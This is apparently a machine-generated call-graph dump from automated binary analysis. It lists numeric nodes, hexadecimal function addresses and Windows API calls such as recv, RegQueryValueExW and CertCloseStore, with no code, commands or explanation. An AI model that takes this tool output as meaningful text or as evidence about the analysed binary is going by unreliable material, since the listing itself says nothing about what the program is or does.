80681->80554 81572 6cc04295 26 API calls 80681->81572 80683 6cbf7511 26 API calls 80683->80691 80684 6cbb78db 81570 6cbc2d2f 68 API calls 80684->81570 80686 6cbf76c0 26 API calls 80686->80691 80687 6cb87564 26 API calls 80687->80691 80688 6cba51b7 40 API calls 80688->80691 80690 6cbf5ac8 42 API calls 80690->80691 80691->80517 80691->80518 80691->80522 80691->80523 80691->80525 80691->80526 80691->80528 80691->80529 80691->80531 80691->80532 80691->80543 80691->80544 80691->80547 80691->80548 80691->80549 80691->80550 80691->80552 80691->80554 80691->80556 80691->80557 80691->80558 80691->80565 80691->80568 80691->80572 80691->80576 80691->80585 80691->80588 80691->80592 80691->80595 80691->80602 80691->80604 80691->80606 80691->80608 80691->80617 80691->80622 80691->80626 80691->80628 80691->80629 80691->80631 80691->80639 80691->80640 80691->80642 80691->80646 80691->80652 80691->80655 80691->80656 80691->80658 80691->80662 80691->80663 80691->80664 80691->80665 80691->80668 80691->80669 80691->80670 80691->80671 80691->80675 80691->80676 80691->80679 80691->80681 80691->80683 80691->80684 80691->80686 80691->80687 80691->80688 80691->80690 80692 6cbf6b55 42 API calls 80691->80692 81521 6cb841ec 27 API calls 80691->81521 81522 6cb8bf3b RtlFreeHeap 80691->81522 81524 6cb9a10e RtlFreeHeap 80691->81524 81526 6cb88cf0 42 API calls 80691->81526 81527 6cbf57d8 40 API calls 80691->81527 81528 6cb8a193 RtlFreeHeap 80691->81528 81529 6cb8690a 29 API calls 80691->81529 81530 6cb85c69 26 API calls 80691->81530 81531 6cbaf794 27 API calls 80691->81531 81536 6cc030ed 40 API calls 80691->81536 81537 6cbb1b74 28 API calls 80691->81537 81538 6cb95758 RtlFreeHeap 80691->81538 81539 6cb85c86 26 API calls 80691->81539 81540 6cb88bbd 26 API calls 80691->81540 81541 6cba10db 46 API calls 80691->81541 81542 6cbd4b7b 26 API calls 80691->81542 81544 6cbd4b7b 26 API calls 80691->81544 81548 6cb845b8 26 API calls 80691->81548 81554 6cbb3e2c RtlFreeHeap 80691->81554 81557 6cbb435e 26 API calls 80691->81557 81558 6cb88e44 26 API calls 80691->81558 81559 6cb97c46 68 API calls 80691->81559 81560 6cbc2d2f 68 API calls 80691->81560 80692->80691 80750 6cbb4a9f 80693->80750 80694 6cba6fce 36 API calls 80694->80750 80695 6cbb77d4 81614 6cc022d0 26 API calls 80695->81614 80696 6cbb77e6 81615 6cc022d0 26 API calls 80696->81615 80697 6cbd4cdc 28 API calls 80697->80750 80700 6cbb77f8 81616 6cc022d0 26 API calls 80700->81616 80701 6cbb6b5a memmove 80701->80750 80703 6cbb5b0a 80703->79953 80704 6cbb7810 81617 6cc04918 26 API calls 80704->81617 80705 6cba7034 35 API calls 80705->80750 80706 6cba563d 26 API calls 80706->80750 80708 6cbb7822 81618 6cc04918 26 API calls 80708->81618 80710 6cbb7836 81619 6cc024e0 26 API calls 80710->81619 80712 6cbb785e 81620 6cc022d0 26 API calls 80712->81620 80714 6cbb388f 56 API calls 80714->80750 80716 6cbb78aa 80718 6cc025d0 26 API calls 80716->80718 80741 6cbb5c06 80718->80741 80719 6cbb7ad4 56 API calls 80719->80750 80720 6cbb7053 80726 6cb98282 RtlFreeHeap 80720->80726 80724 6cbb707c 81608 6cbb3e2c RtlFreeHeap 80724->81608 80729 6cbb70a1 80726->80729 80731 6cb97cc2 RtlFreeHeap 80729->80731 80730 6cbf7511 26 API calls 80730->80750 80734 6cbb70ac 80731->80734 80732 6cb98282 RtlFreeHeap 80736 6cbb6f74 memmove 80732->80736 81609 6cbb7b41 RtlFreeHeap CertCloseStore 80734->81609 80735 6cbb78e9 81624 6cb97c46 68 API calls 80735->81624 80740 6cbb38af RtlFreeHeap 80736->80740 80739 6cbf76c0 26 API calls 80739->80750 80742 6cbb6f9f memmove 80740->80742 80741->80703 81625 6cc04295 26 API calls 80741->81625 80743 6cbb4990 memmove 80742->80743 80745 6cbb7986 26 API calls 80743->80745 80746 6cbb49c9 memmove memmove 80745->80746 80747 6cbb4a15 memmove memmove 80746->80747 80747->80750 80748 6cbb78db 81623 6cbc2d2f 68 API calls 80748->81623 80750->80694 80750->80695 80750->80696 80750->80697 80750->80700 80750->80701 80750->80703 80750->80704 80750->80705 80750->80706 80750->80708 80750->80712 80750->80714 80750->80716 80750->80719 80750->80720 80750->80724 80750->80730 80750->80732 80750->80735 80750->80739 80750->80741 80750->80748 80751 6cbb7986 26 API calls 80750->80751 80752 6cb87564 26 API calls 80750->80752 80754 6cbf5ac8 42 API calls 80750->80754 80755 6cbf6b55 42 API calls 80750->80755 80756 6cbb7c54 2 API calls 80750->80756 80757 6cba51b7 40 API calls 80750->80757 80758 6cb8bf6a 3 API calls 80750->80758 80759 6cb8c01e 4 API calls 80750->80759 80760 6cbb4c30 memmove 80750->80760 80761 6cbb4d25 memmove 80750->80761 80769 6cbb4fdf memmove memmove 80750->80769 80770 6cbb4cc6 memmove 80750->80770 80772 6cbba440 296 API calls 80750->80772 80773 6cb97cc2 RtlFreeHeap 80750->80773 80774 6cbb4f17 memmove 80750->80774 80775 6cb98216 26 API calls 80750->80775 80777 6cbb50bd memmove 80750->80777 80780 6cbb532a memmove 80750->80780 80781 6cbb57dd memmove 80750->80781 80782 6cbb5a79 80750->80782 80789 6cba2d0f 41 API calls 80750->80789 80792 6cbb3e5f 27 API calls 80750->80792 80811 6cbb79bb 28 API calls 80750->80811 80812 6cbb38af RtlFreeHeap 80750->80812 80813 6cbb7938 26 API calls 80750->80813 80822 6cbb61f4 memmove 80750->80822 80825 6cbb637f 80750->80825 80826 6cb8a1f2 26 API calls 80750->80826 80834 6cb89472 RtlFreeHeap 80750->80834 80838 6cbb64c9 memmove 80750->80838 80842 6cbb62a7 memmove 80750->80842 80843 6cbb651a memmove 80750->80843 80844 6cbb630a memmove 80750->80844 80849 6cb98282 RtlFreeHeap 80750->80849 80850 6cb83ca2 27 API calls 80750->80850 80852 6cbb638b memmove 80750->80852 80854 6cbb6430 memmove 80750->80854 80861 6cbb8360 39 API calls 80750->80861 80863 6cbb70dc memmove 80750->80863 80864 6cbb7870 80750->80864 80865 6cbac71f 27 API calls 80750->80865 80867 6cc00b07 memcmp 80750->80867 80869 6cb89744 27 API calls 80750->80869 81574 6cb841ec 27 API calls 80750->81574 81575 6cb8bf3b RtlFreeHeap 80750->81575 81577 6cb9a10e RtlFreeHeap 80750->81577 81579 6cb88cf0 42 API calls 80750->81579 81580 6cbf57d8 40 API calls 80750->81580 81581 6cb8a193 RtlFreeHeap 80750->81581 81582 6cb8690a 29 API calls 80750->81582 81583 6cb85c69 26 API calls 80750->81583 81584 6cbaf794 27 API calls 80750->81584 81589 6cc030ed 40 API calls 80750->81589 81590 6cbb1b74 28 API calls 80750->81590 81591 6cb95758 RtlFreeHeap 80750->81591 81592 6cb85c86 26 API calls 80750->81592 81593 6cb88bbd 26 API calls 80750->81593 81594 6cba10db 46 API calls 80750->81594 81595 6cbd4b7b 26 API calls 80750->81595 81597 6cbd4b7b 26 API calls 80750->81597 81601 6cb845b8 26 API calls 80750->81601 81607 6cbb3e2c RtlFreeHeap 80750->81607 81610 6cbb435e 26 API calls 80750->81610 81611 6cb88e44 26 API calls 80750->81611 81612 6cb97c46 68 API calls 80750->81612 81613 6cbc2d2f 68 API calls 80750->81613 80751->80750 80752->80750 80754->80750 80755->80750 80756->80750 80757->80750 80758->80750 80759->80750 81573 6cb6747b 27 API calls 80760->81573 80762 6cb85479 2 API calls 80761->80762 80764 6cbb4d5f 80762->80764 80764->80710 80765 6cbb4d68 memmove memmove memmove 80764->80765 80767 6cba2d0f 41 API calls 80765->80767 80767->80750 80771 6cba5400 28 API calls 80769->80771 80770->80750 80771->80750 80772->80750 80773->80750 81576 6cbba6e7 26 API calls 80774->81576 80775->80750 81578 6cbb79a3 28 API calls 80777->81578 80780->80782 80783 6cbb536d memmove 80780->80783 80781->80750 80784 6cbb5aab memmove 80781->80784 80782->80784 80787 6cbba440 296 API calls 80783->80787 80785 6cbb5ad2 80784->80785 80786 6cbb5b84 80784->80786 80788 6cb87564 26 API calls 80785->80788 80790 6cbb5b89 memmove 80786->80790 80787->80750 80791 6cbb5aed memmove 80788->80791 80789->80750 80793 6cbf7511 26 API calls 80790->80793 80791->80703 80792->80750 80794 6cbb5bb3 80793->80794 80796 6cbb5bbb 80794->80796 80797 6cbb78c0 80794->80797 80798 6cbf76c0 26 API calls 80796->80798 81622 6cbba6e7 26 API calls 80797->81622 80811->80750 80812->80750 80813->80750 80815 6cbb6109 memmove 80815->80750 80822->80750 81602 6cb88a59 RtlFreeHeap memcmp 80825->81602 80826->80750 80827 6cbb6156 memmove 81596 6cbb828e 28 API calls 80827->81596 80830 6cbb6222 memmove 81598 6cbb828e 28 API calls 80830->81598 80834->80750 80838->80750 80841 6cbb6386 80841->79953 81599 6cba7034 35 API calls 80842->81599 80843->80750 81600 6cba7034 35 API calls 80844->81600 80849->80750 80850->80750 81603 6cbb8335 27 API calls 80852->81603 81605 6cbb8335 27 API calls 80854->81605 80856 6cbb63c2 memmove 81604 6cbb3bfc 37 API calls 80856->81604 80859 6cbb6467 memmove 81606 6cbb3bfc 37 API calls 80859->81606 80861->80750 80863->80750 81621 6cc024e0 26 API calls 80864->81621 80865->80750 80867->80750 80869->80750 80989 6cbb4a9f 80870->80989 80871 6cba2d0f 41 API calls 80871->80989 80872 6cbb79bb 28 API calls 80872->80989 80873 6cbb38af RtlFreeHeap 80873->80989 80875 6cbb7ad4 56 API calls 80875->80989 80878 6cbb6109 memmove 80878->80989 80879 6cbb7053 80887 6cb98282 RtlFreeHeap 80879->80887 80882 6cbb61f4 memmove 80882->80989 80884 6cbb637f 81655 6cb88a59 RtlFreeHeap memcmp 80884->81655 80885 6cbb707c 81661 6cbb3e2c RtlFreeHeap 80885->81661 80886 6cbb6156 memmove 81649 6cbb828e 28 API calls 80886->81649 80894 6cbb70a1 80887->80894 80888 6cbb6222 memmove 81651 6cbb828e 28 API calls 80888->81651 80889 6cbb7938 26 API calls 80889->80989 80893 6cb89472 RtlFreeHeap 80893->80989 80902 6cb97cc2 RtlFreeHeap 80894->80902 80897 6cbb64c9 memmove 80897->80989 80900 6cbb6386 80900->79953 80901 6cbb62a7 memmove 81652 6cba7034 35 API calls 80901->81652 80905 6cbb70ac 80902->80905 80903 6cb98282 RtlFreeHeap 80908 6cbb6f74 memmove 80903->80908 80904 6cbb651a memmove 80904->80989 81662 6cbb7b41 RtlFreeHeap CertCloseStore 80905->81662 80906 6cbb630a memmove 81653 6cba7034 35 API calls 80906->81653 80913 6cbb38af RtlFreeHeap 80908->80913 80909 6cbb78aa 80912 6cc025d0 26 API calls 80909->80912 81031 6cbb5c06 80912->81031 80919 6cbb6f9f memmove 80913->80919 80915 6cb98282 RtlFreeHeap 80915->80989 80916 6cb83ca2 27 API calls 80916->80989 80918 6cbb638b memmove 81656 6cbb8335 27 API calls 80918->81656 80921 6cbb4990 memmove 80919->80921 80920 6cba6fce 36 API calls 80920->80989 80926 6cbb7986 26 API calls 80921->80926 80922 6cbb6430 memmove 81658 6cbb8335 27 API calls 80922->81658 80924 6cbb63c2 memmove 81657 6cbb3bfc 37 API calls 80924->81657 80930 6cbb49c9 memmove memmove 80926->80930 80928 6cbb77d4 81667 6cc022d0 26 API calls 80928->81667 80929 6cbb6467 memmove 81659 6cbb3bfc 37 API calls 80929->81659 80939 6cbb4a15 memmove memmove 80930->80939 80932 6cbb77e6 81668 6cc022d0 26 API calls 80932->81668 80936 6cc00b07 memcmp 80936->80989 80937 6cbac71f 27 API calls 80937->80989 80938 6cbd4cdc 28 API calls 80938->80989 80939->80989 80943 6cbb8360 39 API calls 80943->80989 80944 6cbb77f8 81669 6cc022d0 26 API calls 80944->81669 80946 6cbb6b5a memmove 80946->80989 80948 6cbb7986 26 API calls 80948->80989 80950 6cbb70dc memmove 80950->80989 80951 6cbb7870 81674 6cc024e0 26 API calls 80951->81674 80952 6cbb7810 81670 6cc04918 26 API calls 80952->81670 80953 6cba7034 35 API calls 80953->80989 80958 6cbb7822 81671 6cc04918 26 API calls 80958->81671 80960 6cb89744 27 API calls 80960->80989 80961 6cb8a1f2 26 API calls 80961->80989 80963 6cba563d 26 API calls 80963->80989 80964 6cbb7836 81672 6cc024e0 26 API calls 80964->81672 80966 6cbb7c54 2 API calls 80966->80989 80967 6cbb785e 81673 6cc022d0 26 API calls 80967->81673 80969 6cbb388f 56 API calls 80969->80989 80970 6cb8bf6a 3 API calls 80970->80989 80972 6cb8c01e 4 API calls 80972->80989 80974 6cbf7511 26 API calls 80974->80989 80975 6cbb4c30 memmove 81626 6cb6747b 27 API calls 80975->81626 80976 6cbb4d25 memmove 80979 6cb85479 2 API calls 80976->80979 80978 6cbb78e9 81677 6cb97c46 68 API calls 80978->81677 80981 6cbb4d5f 80979->80981 80981->80964 80983 6cbb4d68 memmove memmove memmove 80981->80983 80984 6cba2d0f 41 API calls 80983->80984 80984->80989 80987 6cbb4fdf memmove memmove 80991 6cba5400 28 API calls 80987->80991 80988 6cbb4cc6 memmove 80988->80989 80989->80871 80989->80872 80989->80873 80989->80875 80989->80879 80989->80882 80989->80884 80989->80885 80989->80889 80989->80893 80989->80897 80989->80901 80989->80903 80989->80904 80989->80906 80989->80909 80989->80915 80989->80916 80989->80918 80989->80920 80989->80922 80989->80928 80989->80932 80989->80936 80989->80937 80989->80938 80989->80943 80989->80944 80989->80946 80989->80948 80989->80950 80989->80951 80989->80952 80989->80953 80989->80958 80989->80960 80989->80961 80989->80963 80989->80966 80989->80967 80989->80969 80989->80970 80989->80972 80989->80974 80989->80975 80989->80976 80989->80978 80989->80987 80989->80988 80990 6cbb78db 80989->80990 80993 6cbf76c0 26 API calls 80989->80993 80994 6cbba440 296 API calls 80989->80994 80995 6cb97cc2 RtlFreeHeap 80989->80995 80997 6cba51b7 40 API calls 80989->80997 80998 6cbb4f17 memmove 80989->80998 80999 6cb98216 26 API calls 80989->80999 81001 6cbb50bd memmove 80989->81001 81002 6cb87564 26 API calls 80989->81002 81003 6cbf6b55 42 API calls 80989->81003 81006 6cbb532a memmove 80989->81006 81007 6cbb57dd memmove 80989->81007 81009 6cbb5a79 80989->81009 81014 6cbf5ac8 42 API calls 80989->81014 81019 6cbb3e5f 27 API calls 80989->81019 80989->81031 81038 6cbb5b0a 80989->81038 81627 6cb841ec 27 API calls 80989->81627 81628 6cb8bf3b RtlFreeHeap 80989->81628 81630 6cb9a10e RtlFreeHeap 80989->81630 81632 6cb88cf0 42 API calls 80989->81632 81633 6cbf57d8 40 API calls 80989->81633 81634 6cb8a193 RtlFreeHeap 80989->81634 81635 6cb8690a 29 API calls 80989->81635 81636 6cb85c69 26 API calls 80989->81636 81637 6cbaf794 27 API calls 80989->81637 81642 6cc030ed 40 API calls 80989->81642 81643 6cbb1b74 28 API calls 80989->81643 81644 6cb95758 RtlFreeHeap 80989->81644 81645 6cb85c86 26 API calls 80989->81645 81646 6cb88bbd 26 API calls 80989->81646 81647 6cba10db 46 API calls 80989->81647 81648 6cbd4b7b 26 API calls 80989->81648 81650 6cbd4b7b 26 API calls 80989->81650 81654 6cb845b8 26 API calls 80989->81654 81660 6cbb3e2c RtlFreeHeap 80989->81660 81663 6cbb435e 26 API calls 80989->81663 81664 6cb88e44 26 API calls 80989->81664 81665 6cb97c46 68 API calls 80989->81665 81666 6cbc2d2f 68 API calls 80989->81666 81676 6cbc2d2f 68 API calls 80990->81676 80991->80989 80993->80989 80994->80989 80995->80989 80997->80989 81629 6cbba6e7 26 API calls 80998->81629 80999->80989 81631 6cbb79a3 28 API calls 81001->81631 81002->80989 81003->80989 81008 6cbb536d memmove 81006->81008 81006->81009 81007->80989 81010 6cbb5aab memmove 81007->81010 81011 6cbba440 296 API calls 81008->81011 81009->81010 81012 6cbb5ad2 81010->81012 81013 6cbb5b84 81010->81013 81011->80989 81015 6cb87564 26 API calls 81012->81015 81016 6cbb5b89 memmove 81013->81016 81014->80989 81017 6cbb5aed memmove 81015->81017 81018 6cbf7511 26 API calls 81016->81018 81017->81038 81020 6cbb5bb3 81018->81020 81019->80989 81021 6cbb5bbb 81020->81021 81022 6cbb78c0 81020->81022 81023 6cbf76c0 26 API calls 81021->81023 81675 6cbba6e7 26 API calls 81022->81675 81031->81038 81678 6cc04295 26 API calls 81031->81678 81038->79953 81047->79834 81048->79953 81049->79953 81050->79917 81051->79953 81052->79953 81053->79953 81054->79953 81055->79953 81056->79953 81057->79953 81058->79953 81059->79953 81060->79953 81061->79953 81062->79953 81063->79953 81064->79953 81065->79950 81066->79953 81067->79953 81068->79953 81069->79953 81070->79843 81071->79852 81072->79844 81073->79877 81074->79847 81075->79856 81076->79860 81077->79844 81078->79854 81079->79860 81080->79918 81081->79907 81082->79910 81083->79912 81084->79918 81085->79918 81086->79934 81087->79938 81088->79941 81089->79918 81090->79852 81091->79874 81092->79876 81093->79882 81094->79886 81095->79889 81096->79871 81097->79875 81098->79875 81099->79874 81327 6cb88c76 81104->81327 81106 6cbb7991 81328 6cb88c86 81327->81328 81330 6cb88c8d 81327->81330 81328->81330 81331 6cb89f99 26 API calls 81328->81331 81330->81106 81331->81330 81412 6cb88c76 26 API calls 81411->81412 81413 6cbb7947 81411->81413 81412->81413 81413->80155 81467->80450 81468->80450 81470->80450 81471->80450 81472->80450 81473->80450 81474->80450 81475->80450 81476->80450 81477->80450 81478->80450 81483->80450 81484->80450 81485->80450 81486->80450 81487->80450 81488->80416 81489->80430 81490->80450 81491->80434 81492->80450 81495->80450 81496->80447 81497->80472 81498->80450 81499->80478 81500->80450 81504->80450 81505->80450 81506->80450 81507->80450 81517->80411 81518->80411 81520->80691 81521->80691 81523->80691 81524->80691 81525->80691 81526->80691 81527->80691 81528->80691 81529->80691 81530->80691 81531->80691 81536->80691 81537->80691 81538->80691 81539->80691 81540->80691 81541->80594 81542->80607 81543->80691 81544->80612 81545->80691 81548->80691 81549->80625 81550->80648 81551->80691 81552->80653 81553->80691 81557->80691 81558->80691 81559->80691 81560->80691 81569->80681 81570->80681 81571->80681 81573->80750 81574->80750 81576->80750 81577->80750 81578->80750 81579->80750 81580->80750 81581->80750 81582->80750 81583->80750 81584->80750 81589->80750 81590->80750 81591->80750 81592->80750 81593->80750 81594->80815 81595->80827 81596->80750 81597->80830 81598->80750 81601->80750 81602->80841 81603->80856 81604->80750 81605->80859 81606->80750 81610->80750 81611->80750 81612->80750 81613->80750 81622->80741 81623->80741 81624->80741 81626->80989 81627->80989 81629->80989 81630->80989 81631->80989 81632->80989 81633->80989 81634->80989 81635->80989 81636->80989 81637->80989 81642->80989 81643->80989 81644->80989 81645->80989 81646->80989 81647->80878 81648->80886 81649->80989 81650->80888 81651->80989 81654->80989 81655->80900 81656->80924 81657->80989 81658->80929 81659->80989 81663->80989 81664->80989 81665->80989 81666->80989 81675->81031 81676->81031 81677->81031 81702 6cbc8e23 81679->81702 81684 6cb98c19 81721 6cbf360e 26 API calls 81684->81721 81686 6cb98c2a 81708 6cbc8c93 81702->81708 81705 6cbc8c66 81706 6cbc8c93 68 API calls 81705->81706 81707 6cb97553 81706->81707 81707->81684 81709 6cbf79a1 26 API calls 81708->81709 81710 6cbc8ca6 81709->81710 81715 6cbc8cc7 81710->81715 81713 6cbf79a1 26 API calls 81714 6cb9753b 81713->81714 81714->81705 81717 6cbc8ccd 81715->81717 81716 6cbc8cb4 81716->81713 81717->81716 81720 6cb97c46 68 API calls 81717->81720 81719 6cbc8ced 81720->81719 81721->81686 81774 6cbf36fa 81771->81774 81775 6cb9894b 81774->81775 81776 6cbf3710 81774->81776 81775->79360 81789 6cc022d0 26 API calls 81776->81789 81790->79502 81791->79504 81792->79505 81793->79505 81794 6cbf84e7 81810 6cbf8538 81794->81810 81795 6cbf7d41 41 API calls 81795->81810 81796 6cbf86df 81815 6cc02170 26 API calls 81796->81815 81797 6cbf8588 recv 81800 6cbf85a0 WSAGetLastError 81797->81800 81797->81810 81798 6cbf86f1 81816 6cc025b0 26 API calls 81798->81816 81800->81810 81802 6cbf86ae 81803 6cbf86ca 81802->81803 81804 6cc025d0 26 API calls 81802->81804 81805 6cbf8692 81803->81805 81817 6cc02230 26 API calls 81803->81817 81804->81803 81810->81795 81810->81796 81810->81797 81810->81798 81810->81802 81810->81805 81811 6cb95588 RtlFreeHeap 81810->81811 81812 6cbf7cef 26 API calls 81810->81812 81813 6cb87fe5 RtlFreeHeap 81810->81813 81814 6cb94da7 35 API calls 81810->81814 81811->81810 81812->81810 81813->81810 81814->81810 81818 6cbaca81 81821 6cbaca8e 81818->81821 81822 6cbacaa9 81821->81822 81823 6cbacace 81821->81823 81830 6cc0099b 81822->81830 81833 6cbb1c98 81822->81833 81947 6cc02230 26 API calls 81823->81947 81825 6cbacaab 81826 6cbaca8a 81825->81826 81946 6cb9a65c RtlFreeHeap 81825->81946 81831 6cc009a6 81830->81831 81832 6cc0099f RegCloseKey 81830->81832 81831->81825 81832->81831 81948 6cbb1744 81833->81948 81836 6cbb1ce5 81951 6cbe6a1a RtlFreeHeap 81836->81951 81838 6cbb1cfb 81839 6cbb1cff 81838->81839 81840 6cbb1d13 81838->81840 81952 6cba1091 26 API calls 81839->81952 81953 6cbac93d 81840->81953 81843 6cbb1d0a 81845 6cc0099b RegCloseKey 81843->81845 81844 6cbb1d2e 81848 6cbb1d93 81844->81848 81850 6cbac93d 27 API calls 81844->81850 81846 6cbb1dcf 81845->81846 81851 6cbb1df1 81846->81851 81854 6cb65ad0 RtlFreeHeap 81846->81854 81966 6cba1091 26 API calls 81848->81966 81859 6cbb1d88 81850->81859 81967 6cbb2795 26 API calls 81851->81967 81853 6cbb1db8 81856 6cc0099b RegCloseKey 81853->81856 81854->81851 81856->81843 81857 6cbb1dfa 81968 6cbed120 26 API calls 81857->81968 81859->81848 81901 6cbb2745 81859->81901 81991 6cc008d4 26 API calls 81859->81991 81861 6cbb2759 81861->81848 81866 6cbb2767 81861->81866 81863 6cbb1e0f 81864 6cbb1e18 81863->81864 81865 6cbb1e52 81863->81865 81969 6cbb27e7 40 API calls 81864->81969 81971 6cb95758 RtlFreeHeap 81865->81971 81868 6cbb2775 81866->81868 82005 6cb95758 RtlFreeHeap 81866->82005 81872 6cc0099b RegCloseKey 81868->81872 81870 6cbb1e2f 81873 6cbb1e4d 81870->81873 81970 6cbb27e7 40 API calls 81870->81970 81874 6cbb2786 81872->81874 81972 6cbb27e7 40 API calls 81873->81972 81878 6cbb1e75 81879 6cbb1e93 81878->81879 81973 6cbb27e7 40 API calls 81878->81973 81974 6cbb27e7 40 API calls 81879->81974 81880 6cbb2509 81891 6cbb2715 81880->81891 81880->81901 81911 6cc009a7 27 API calls 81880->81911 81883 6cbb1ead 81886 6cbb1ecb 81883->81886 81975 6cbb27e7 40 API calls 81883->81975 81885 6cbb22ab 81885->81880 81992 6cc00970 26 API calls 81885->81992 81993 6cc008d4 26 API calls 81885->81993 81894 6cbb1f10 81886->81894 81976 6cbb27e7 40 API calls 81886->81976 81890 6cbb23f6 memmove 81890->81885 82002 6cc009a7 27 API calls 81891->82002 81892 6cbb1eee 81977 6cbb27e7 40 API calls 81892->81977 81897 6cbb1fd7 81894->81897 81900 6cbb1f63 81894->81900 81896 6cbb2731 82003 6cb95758 RtlFreeHeap 81896->82003 81899 6cbb2024 81897->81899 81981 6cb95758 RtlFreeHeap 81897->81981 81902 6cb87564 26 API calls 81899->81902 81978 6cbb2795 26 API calls 81900->81978 82004 6cbaca21 RtlFreeHeap 81901->82004 81905 6cbb25fd 81902->81905 81905->81825 81906 6cbb1f81 81907 6cc00b07 memcmp 81906->81907 81908 6cbb1f8a 81906->81908 81907->81908 81911->81880 81946->81826 82006 6cbe6706 81948->82006 81951->81838 81952->81843 81954 6cbb1744 26 API calls 81953->81954 81955 6cbac95a 81954->81955 82013 6cbfb59e 81955->82013 81957 6cbac976 81958 6cbac98c RegQueryValueExW 81957->81958 82018 6cb6e4eb 26 API calls 81957->82018 81958->81957 81959 6cbac9b5 81958->81959 81962 6cbac9f3 81959->81962 82019 6cb95758 RtlFreeHeap 81959->82019 82020 6cbe6a1a RtlFreeHeap 81962->82020 81964 6cbaca19 81964->81844 81965 6cbaca21 RtlFreeHeap 81964->81965 81965->81844 81966->81853 81967->81857 81968->81863 81969->81870 81970->81873 81971->81873 81972->81878 81973->81879 81974->81883 81975->81886 81976->81892 81977->81894 81978->81906 81981->81899 81991->81885 81992->81885 81993->81890 82002->81896 82003->81901 82004->81861 82005->81868 82008 6cbe6718 82006->82008 82007 6cbb1768 RegOpenKeyExW 82007->81836 82008->82007 82009 6cbe65d5 26 API calls 82008->82009 82010 6cbe6750 82009->82010 82010->82007 82012 6cbe6609 26 API calls 82010->82012 82012->82010 82014 6cbe67e8 3 API calls 82013->82014 82015 6cbfb5b2 82014->82015 82016 6cbfb5bc 82015->82016 82021 6cc01e20 26 API calls 82015->82021 82016->81957 82018->81957 82019->81962 82020->81964 82022 6cb614ab 82023 6cb614a1 82022->82023 82023->82022 82024 6cb614d1 82023->82024 82124 6cc021d0 26 API calls 82023->82124 82125 6cb86a4f 29 API calls 82024->82125 82027 6cb6151b 82126 6cbf5053 26 API calls 82027->82126 82029 6cb61543 82127 6cbb87b0 26 API calls 82029->82127 82031 6cb615a0 82032 6cb87564 26 API calls 82031->82032 82033 6cb615af 82032->82033 82034 6cb638ad 82033->82034 82035 6cb87564 26 API calls 82033->82035 82159 6cc0429a 26 API calls 82034->82159 82037 6cb6163b 82035->82037 82037->82034 82039 6cbfb59e 26 API calls 82037->82039 82040 6cb61673 memmove 82039->82040 82128 6cbe9260 82040->82128 82044 6cb6180b 82044->82034 82045 6cb87564 26 API calls 82044->82045 82046 6cb61841 82045->82046 82046->82034 82133 6cbeea20 82046->82133 82049 6cbeea20 26 API calls 82050 6cb61883 82049->82050 82141 6cb99d92 82050->82141 82052 6cb61895 82053 6cb618a8 82052->82053 82148 6cbe9220 27 API calls 82052->82148 82054 6cb87564 26 API calls 82053->82054 82056 6cb618b5 82054->82056 82109 6cbefa90 82056->82109 82110 6cbf0110 3 API calls 82109->82110 82111 6cbefad3 82110->82111 82125->82027 82126->82029 82127->82031 82129 6cb616bc 82128->82129 82130 6cbe9276 82128->82130 82132 6cbeaaa0 26 API calls 82129->82132 82131 6cb65ad0 RtlFreeHeap 82130->82131 82131->82129 82132->82044 82134 6cbeea51 82133->82134 82135 6cb61867 82134->82135 82136 6cbeeabb 82134->82136 82138 6cbeea9e 82134->82138 82239 6cbeeb30 RtlFreeHeap 82134->82239 82135->82034 82135->82049 82241 6cc04e50 26 API calls 82136->82241 82240 6cc024e0 26 API calls 82138->82240 82142 6cb99d98 82141->82142 82143 6cb99da2 82141->82143 82142->82143 82242 6cb95758 RtlFreeHeap 82142->82242 82143->82052 82145 6cbf6a32 82146 6cbf6a47 82145->82146 82147 6cb65ad0 RtlFreeHeap 82145->82147 82146->82052 82147->82146 82148->82053 82239->82138 82241->82135 82242->82145 82243 6cbab537 82244 6cbab55e 82243->82244 82245 6cbabe40 82243->82245 82272 6cbab6e9 82244->82272 82360 6cbefdd0 30 API calls __aulldiv 82244->82360 82404 6cc022d0 26 API calls 82245->82404 82249 6cbabe52 82405 6cc024e0 26 API calls 82249->82405 82250 6cbab57a 82252 6cb87584 2 API calls 82250->82252 82254 6cbab59d 82252->82254 82253 6cbabe81 82406 6cc022d0 26 API calls 82253->82406 82254->82249 82257 6cbab5a6 82254->82257 82256 6cbabc0b 82260 6cbabc22 82256->82260 82387 6cbb399e 46 API calls 82256->82387 82319 6cbab671 82257->82319 82361 6cb8aad9 45 API calls 82257->82361 82258 6cbabe93 82261 6cc025d0 26 API calls 82258->82261 82388 6cbd417d 32 API calls 82260->82388 82262 6cbabc45 82267 6cb9796c RtlFreeHeap 82262->82267 82263 6cbab6dd 82369 6cb95841 WakeByAddressSingle 82263->82369 82264 6cbab6f2 82370 6cb732d8 26 API calls 82264->82370 82271 6cbabc56 82267->82271 82270 6cbab5ef 82270->82319 82362 6cbf422a 45 API calls 82270->82362 82389 6cb7a132 RtlFreeHeap 82271->82389 82343 6cbababa 82272->82343 82358 6cbca398 82272->82358 82274 6cbab7ca 82374 6cb8ab5d 26 API calls 82274->82374 82276 6cbab60c 82276->82319 82363 6cb8ab44 26 API calls 82276->82363 82277 6cbabc67 82390 6cbb176d RtlFreeHeap 82277->82390 82279 6cbab7f4 82375 6cbf99b8 28 API calls 82279->82375 82281 6cbaba9d 82384 6cb95841 WakeByAddressSingle 82281->82384 82284 6cbab626 82364 6cbf0060 26 API calls 82284->82364 82285 6cbab74f 82285->82281 82371 6cbf422a 45 API calls 82285->82371 82287 6cbab707 82287->82274 82287->82285 82382 6cb7e263 26 API calls 82287->82382 82288 6cbab823 82305 6cbab85b 82288->82305 82376 6cb8a8ab 30 API calls 82288->82376 82291 6cbabc83 82391 6cb67b7d RtlFreeHeap 82291->82391 82292 6cbab784 82292->82281 82296 6cbab78c 82292->82296 82332 6cbabb6f 82296->82332 82372 6cbf70dd 41 API calls 82296->82372 82297 6cbabc8e 82310 6cbabca9 82297->82310 82392 6cb98636 RtlFreeHeap 82297->82392 82298 6cbaba58 82298->82274 82300 6cbaba64 82298->82300 82299 6cbab84f 82377 6cb8aad9 45 API calls 82299->82377 82300->82285 82306 6cbaba71 82300->82306 82303 6cbab645 82303->82319 82365 6cb8a8c7 30 API calls 82303->82365 82305->82258 82305->82281 82314 6cbab96f 82305->82314 82378 6cb8ab7d 26 API calls 82305->82378 82383 6cb8a9d3 RtlFreeHeap 82306->82383 82309 6cbabcca 82394 6cb67b7d RtlFreeHeap 82309->82394 82310->82309 82393 6cb98636 RtlFreeHeap 82310->82393 82311 6cbab7a9 82317 6cbabb41 